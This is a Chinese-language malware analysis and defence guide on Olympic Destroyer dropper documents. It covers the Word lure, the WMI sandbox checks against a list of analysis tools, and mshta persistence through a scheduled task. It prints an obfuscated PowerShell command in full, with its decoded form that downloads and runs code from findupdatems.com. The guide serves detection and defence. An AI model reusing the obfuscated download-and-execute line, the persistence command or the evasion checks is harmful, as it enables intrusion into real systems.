新一波Olympic Destroyer Droppers出现
字数 1616 2025-08-18 17:33:04

Olympic Destroyer Droppers 技术分析与防御指南

1. 概述

Olympic Destroyer 是由 Hades APT 组织开发的一种恶意软件,主要用于针对特定目标的高级持续性威胁(APT)攻击。本文档将详细分析其最新变种的技术特点、攻击流程和防御措施。

2. 样本基本信息

  • MD5: cd15a7c3cb1725dc9d21160c26ab9c2e
  • 文件名: "ТЕХНИЧЕСКОЕ_ЗАДАНИЕ_НА_РАЗРАБОТКУ_МОБИЛЬНОГО_ПРИЛОЖЕНИЯ.doc" (俄语,意为"移动应用开发技术规范")
  • 创建日期: 2018-10-09 07:23:00
  • 作者: James

3. 攻击流程分析

3.1 初始感染阶段

  1. 诱饵文档:

    • 初始显示为空白页
    • 启用宏后,宏将白色文本变为黑色,显示实际内容
    • 内容来源于网络的合法文档,具有高度欺骗性

  2. WMI反分析:

    • 使用WMI查询运行进程
    • 将进程名与40多种分析工具进行比较
    • 检查进程数量(至少40个)以识别沙箱环境

3.2 反分析技术

检测的分析工具列表:

HaCKER, MalzILlA, pRocExP, WiREShARK, HxD, PowERsheLl_iSE, idA, Olly, 
fiDDLEr, mALwAre, VmtoOLsd, SWingBoX, vboXTrAY, secunia, hijack, 
VmtoOlsd', Vbox, vMWaRE, VXsTReaM, AUtOIt, vmToOls, TcpVIeW, 
WiREShARK, prOCEss expLorer, VIsuAl bASiC, fiDDLEr

3.3 持久化与执行

  1. 释放HTA文件:

    • 路径: %APPDATA%\WPFT532.hta

  2. 计划任务创建:

    schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta C:\\Users\\[user]\\AppData\\Roaming\\WPFT532.hta"
    • 参数说明:
      • /F: 强制创建任务
      • /SC: 计划每日任务
      • /ST: 开始时间
      • /TN: 任务名称

  3. HTA执行:

    • 使用VBScript解码下一阶段命令行
    • 技术与宏阶段相同

3.4 Powershell下载与执行

混淆的Powershell命令:

c:\\WiNDOws\\sYsTEM32\\Cmd.eXE /c "Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116,114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 , 107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 , 120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 , 114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50, 43 ,91 , 99 ,104, 65, 114 , 93,49,48,56, 43, 91 ,99, 104, 65,114,93 , 49 , 50 ,50,41,44, 39, 124 , 39 ,41 , 124 , 32, 46 , 32 , 40 , 32 ,36, 69, 110 ,86 , 58,67 , 79, 109 , 83, 80, 101 , 99 ,91,52 , 44 ,50, 52 ,44 ,50,53, 93 , 45 , 106,79 ,73 ,110 ,39 , 39, 41)pshOme[21]+$PSHoMe[30]+'x') &&Set gnPq=ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe ^| pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -&& c:\\WiNDOws\\sYsTEM32\\Cmd.eXE /c %gNpq%"

去混淆后的Powershell阶段1:

('(N'+'ew-O'+'bject Net.W'+'ebclient)'+'.'+'downlo'+'adstring(Hl'+'jht'+'tp:'+'//findupda'+'te'+'ms.com/ch'+'e'+'ck/in'+'dexHlj)'+'4j'+'zIEX').RepLaCe(([chAr]72+[chAr]108+[chAr]106),[StrIng][chAr]39).RepLaCe(([chAr]52+[chAr]106+[chAr]122),'|')

去混淆后的Powershell阶段2:

(New-Object Net.Webclient).downloadstring('http://findupdatems.com/check/index')|IEX

4. 技术特征

4.1 元数据特征

  • 文档作者通常为: James, john 或 AV Dummy

4.2 编码与混淆技术

  1. 字符串编码:

    • 使用自定义解码函数(如 MSART8)
    • 通过减少每个字符的ASCII值(减一个常数)进行编码
    • 不同样本使用不同的常数值

  2. 十六进制转换:

    • 将十六进制字符串转换为文本

4.3 文档诱饵技术

  1. 移除诱饵图像:

    For Each o In ActiveDocument.InlineShapes
    o.Delete
Next o

  2. 文本颜色变化:

    ActiveDocument.Range.Font.Hidden = False

4.4 触发器技术

避免使用常见的AutoOpen触发器,使用以下非常规触发器:

MultiPage1_LayoutFrame1_LayoutSystemMonitor1_GotFocus
Image1_MouseMove
ImageCombo21_Change

5. 网络基础设施

  • 使用被黑服务器作为C2代理
  • 请求被重定向到Empire后台服务器
  • 使用修改版的Empire hop.php作为代理

示例请求:

e160ca75a0e8c4bc9177f412b09e7a29 (首次出现: 2018-06-05)
ac85b1fff1fe43ddad28bf1c4ce021c5 (首次出现: 2018-10-11)

6. 防御措施

6.1 预防措施

  1. 宏安全设置:

    • 禁用Office文档中的宏执行
    • 或设置为"仅允许受信任位置的宏"

  2. 用户教育:

    • 培训用户识别可疑文档
    • 警惕来自未知来源的文档

  3. 系统加固:

    • 限制WMI查询权限
    • 禁用不必要的计划任务创建

6.2 检测措施

  1. 行为监控:

    • 监控异常的WMI查询
    • 检测计划任务的异常创建

  2. 网络监控:

    • 拦截对已知恶意域名的访问(findupdatems.com等)
    • 检测异常的HTTP下载行为

  3. 文件监控:

    • 监控%APPDATA%目录下的HTA文件创建
    • 检测文档中的异常宏代码

6.3 响应措施

  1. 隔离感染主机
  2. 分析计划任务和持久化机制
  3. 检查网络连接日志
  4. 更新杀毒软件特征库

7. IOC (Indicators of Compromise)

  • 文件哈希:

    • MD5: cd15a7c3cb1725dc9d21160c26ab9c2e

  • 网络IOC:

    • C2 URL: http://findupdatems.com/check/index

  • 文件路径:

    • %APPDATA%\WPFT532.hta
    • 计划任务名: DriveCloudTaskCoreCheck

8. 总结

Hades APT组织持续进化其Olympic Destroyer恶意软件,最新变种增加了反分析和延迟执行功能,能够有效规避沙箱检测。防御此类攻击需要多层次的安全策略,包括严格的宏安全设置、用户教育和全面的监控措施。

Olympic Destroyer Droppers 技术分析与防御指南 1. 概述 Olympic Destroyer 是由 Hades APT 组织开发的一种恶意软件,主要用于针对特定目标的高级持续性威胁(APT)攻击。本文档将详细分析其最新变种的技术特点、攻击流程和防御措施。 2. 样本基本信息 MD5 : cd15a7c3cb1725dc9d21160c26ab9c2e 文件名 : "ТЕХНИЧЕСКОЕ_ ЗАДАНИЕ_ НА_ РАЗРАБОТКУ_ МОБИЛЬНОГО_ ПРИЛОЖЕНИЯ.doc" (俄语,意为"移动应用开发技术规范") 创建日期 : 2018-10-09 07:23:00 作者 : James 3. 攻击流程分析 3.1 初始感染阶段 诱饵文档 : 初始显示为空白页 启用宏后,宏将白色文本变为黑色,显示实际内容 内容来源于网络的合法文档,具有高度欺骗性 WMI反分析 : 使用WMI查询运行进程 将进程名与40多种分析工具进行比较 检查进程数量(至少40个)以识别沙箱环境 3.2 反分析技术 检测的分析工具列表 : 3.3 持久化与执行 释放HTA文件 : 路径: %APPDATA%\WPFT532.hta 计划任务创建 : 参数说明: /F : 强制创建任务 /SC : 计划每日任务 /ST : 开始时间 /TN : 任务名称 HTA执行 : 使用VBScript解码下一阶段命令行 技术与宏阶段相同 3.4 Powershell下载与执行 混淆的Powershell命令 : 去混淆后的Powershell阶段1 : 去混淆后的Powershell阶段2 : 4. 技术特征 4.1 元数据特征 文档作者通常为: James, john 或 AV Dummy 4.2 编码与混淆技术 字符串编码 : 使用自定义解码函数(如 MSART8) 通过减少每个字符的ASCII值(减一个常数)进行编码 不同样本使用不同的常数值 十六进制转换 : 将十六进制字符串转换为文本 4.3 文档诱饵技术 移除诱饵图像 : 文本颜色变化 : 4.4 触发器技术 避免使用常见的AutoOpen触发器,使用以下非常规触发器: 5. 网络基础设施 使用被黑服务器作为C2代理 请求被重定向到Empire后台服务器 使用修改版的Empire hop.php作为代理 示例请求 : 6. 防御措施 6.1 预防措施 宏安全设置 : 禁用Office文档中的宏执行 或设置为"仅允许受信任位置的宏" 用户教育 : 培训用户识别可疑文档 警惕来自未知来源的文档 系统加固 : 限制WMI查询权限 禁用不必要的计划任务创建 6.2 检测措施 行为监控 : 监控异常的WMI查询 检测计划任务的异常创建 网络监控 : 拦截对已知恶意域名的访问(findupdatems.com等) 检测异常的HTTP下载行为 文件监控 : 监控%APPDATA%目录下的HTA文件创建 检测文档中的异常宏代码 6.3 响应措施 隔离感染主机 分析计划任务和持久化机制 检查网络连接日志 更新杀毒软件特征库 7. IOC (Indicators of Compromise) 文件哈希 : MD5: cd15a7c3cb1725dc9d21160c26ab9c2e 网络IOC : C2 URL: http://findupdatems.com/check/index 文件路径 : %APPDATA%\WPFT532.hta 计划任务名: DriveCloudTaskCoreCheck 8. 总结 Hades APT组织持续进化其Olympic Destroyer恶意软件,最新变种增加了反分析和延迟执行功能,能够有效规避沙箱检测。防御此类攻击需要多层次的安全策略,包括严格的宏安全设置、用户教育和全面的监控措施。